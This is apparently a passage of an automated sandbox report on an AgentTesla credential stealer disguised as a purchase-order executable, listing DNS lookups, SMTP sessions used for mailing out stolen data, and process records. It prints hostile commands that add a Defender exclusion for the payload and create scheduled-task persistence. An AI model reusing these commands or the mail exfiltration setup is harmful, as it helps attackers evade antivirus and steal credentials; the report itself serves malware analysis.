                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)

                                                SMTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                May 14, 2022 11:37:10.559385061 CEST58749747208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:37:10.559766054 CEST49747587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:37:10.782027960 CEST58749747208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:37:10.783271074 CEST49747587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:37:11.317747116 CEST58749747208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:37:11.405200958 CEST49747587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:37:11.628443956 CEST58749747208.91.198.38192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:37:11.853620052 CEST58749747208.91.198.38192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:37:11.854393959 CEST49747587192.168.2.3208.91.198.38MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:37:12.079016924 CEST58749747208.91.198.38192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:37:12.079271078 CEST49747587192.168.2.3208.91.198.38RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:37:12.321695089 CEST58749747208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:37:12.857587099 CEST58749747208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:37:40.828701973 CEST58749752162.222.225.16192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:37:40.828891039 CEST49752587192.168.2.3162.222.225.16EHLO 035347
                                                May 14, 2022 11:37:41.049762011 CEST58749752162.222.225.16192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:37:41.049993992 CEST49752587192.168.2.3162.222.225.16AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:37:41.271897078 CEST58749752162.222.225.16192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:37:41.496193886 CEST58749752162.222.225.16192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:37:41.496411085 CEST49752587192.168.2.3162.222.225.16MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:37:42.029009104 CEST58749752162.222.225.16192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:37:42.108721972 CEST49752587192.168.2.3162.222.225.16MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:37:42.718844891 CEST49752587192.168.2.3162.222.225.16MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:37:42.941464901 CEST58749752162.222.225.16192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:37:42.941850901 CEST49752587192.168.2.3162.222.225.16RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:37:43.174514055 CEST58749752162.222.225.16192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:38:17.770459890 CEST58749823208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:38:17.770930052 CEST49823587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:18.305701971 CEST58749823208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:38:18.424050093 CEST49823587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:19.221009970 CEST49823587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:19.443476915 CEST58749823208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:38:19.443802118 CEST49823587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:20.649733067 CEST58749823208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:38:22.111876011 CEST49823587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:27.252902985 CEST49823587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:27.453726053 CEST58749823208.91.198.38192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:38:27.657000065 CEST58749823208.91.198.38192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:38:27.657284021 CEST49823587192.168.2.3208.91.198.38MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:38:27.858243942 CEST58749823208.91.198.38192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:38:27.858702898 CEST49823587192.168.2.3208.91.198.38RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:38:28.080161095 CEST58749823208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:38:32.531996012 CEST58749837208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:38:32.535051107 CEST49837587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:32.734733105 CEST58749837208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:38:32.735054970 CEST49837587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:32.935878038 CEST58749837208.91.198.38192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:38:33.138474941 CEST58749837208.91.198.38192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:38:33.435726881 CEST49837587192.168.2.3208.91.198.38MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:38:33.637151957 CEST58749837208.91.198.38192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:38:33.637434006 CEST49837587192.168.2.3208.91.198.38RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:38:33.848023891 CEST58749837208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:38:36.027163982 CEST58749838208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:38:36.027412891 CEST49838587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:36.237903118 CEST58749839208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:38:36.238543987 CEST49839587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:36.248081923 CEST58749838208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:38:36.248332024 CEST49838587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:36.459332943 CEST58749839208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:38:36.459573984 CEST49839587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:36.470254898 CEST58749838208.91.198.38192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:38:36.681509018 CEST58749839208.91.198.38192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:38:36.693423033 CEST58749838208.91.198.38192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:38:36.693746090 CEST49838587192.168.2.3208.91.198.38MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:38:36.909193039 CEST58749839208.91.198.38192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:38:36.909476995 CEST49839587192.168.2.3208.91.198.38MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:38:36.917265892 CEST58749838208.91.198.38192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:38:36.919039965 CEST49838587192.168.2.3208.91.198.38RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:38:37.132623911 CEST58749839208.91.198.38192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:38:37.133021116 CEST49839587192.168.2.3208.91.198.38RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:38:37.152249098 CEST58749838208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:38:37.371928930 CEST58749839208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:11:36:28
                                                Start date:14/05/2022
                                                Path:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe"
                                                Imagebase:0xb30000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Target ID:4
                                                Start time:11:36:42
                                                Start date:14/05/2022
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                                                Imagebase:0xf70000
                                                File size:430592 bytes
                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                General

                                                Target ID:5
                                                Start time:11:36:42
                                                Start date:14/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:6
                                                Start time:11:36:42
                                                Start date:14/05/2022
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                                                Imagebase:0xf50000
                                                File size:185856 bytes
                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:7
                                                Start time:11:36:44
                                                Start date:14/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:8
                                                Start time:11:36:45
                                                Start date:14/05/2022
                                                Path:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                Imagebase:0x2d0000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                General

                                                Target ID:9
                                                Start time:11:36:47
                                                Start date:14/05/2022
                                                Path:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                Imagebase:0x710000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Target ID:20
                                                Start time:11:37:06
                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe"
                                                Imagebase:0x810000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 62%, ReversingLabs
                                                Reputation:low

                                                General

                                                Target ID:22
                                                Start time:11:37:14
                                                Start date:14/05/2022
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp
                                                Imagebase:0xf50000
                                                File size:185856 bytes
                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:23
                                                Start time:11:37:14
                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe"
                                                Imagebase:0x750000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Target ID:24
                                                Start time:11:37:15
                                                Start date:14/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:25
                                                Start time:11:37:16
                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Imagebase:0x9b0000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Target ID:27
                                                Start time:11:37:26
                                                Start date:14/05/2022
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp
                                                Imagebase:0xf50000
                                                File size:185856 bytes
                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:28
                                                Start time:11:37:26
                                                Start date:14/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:29
                                                Start time:11:37:28
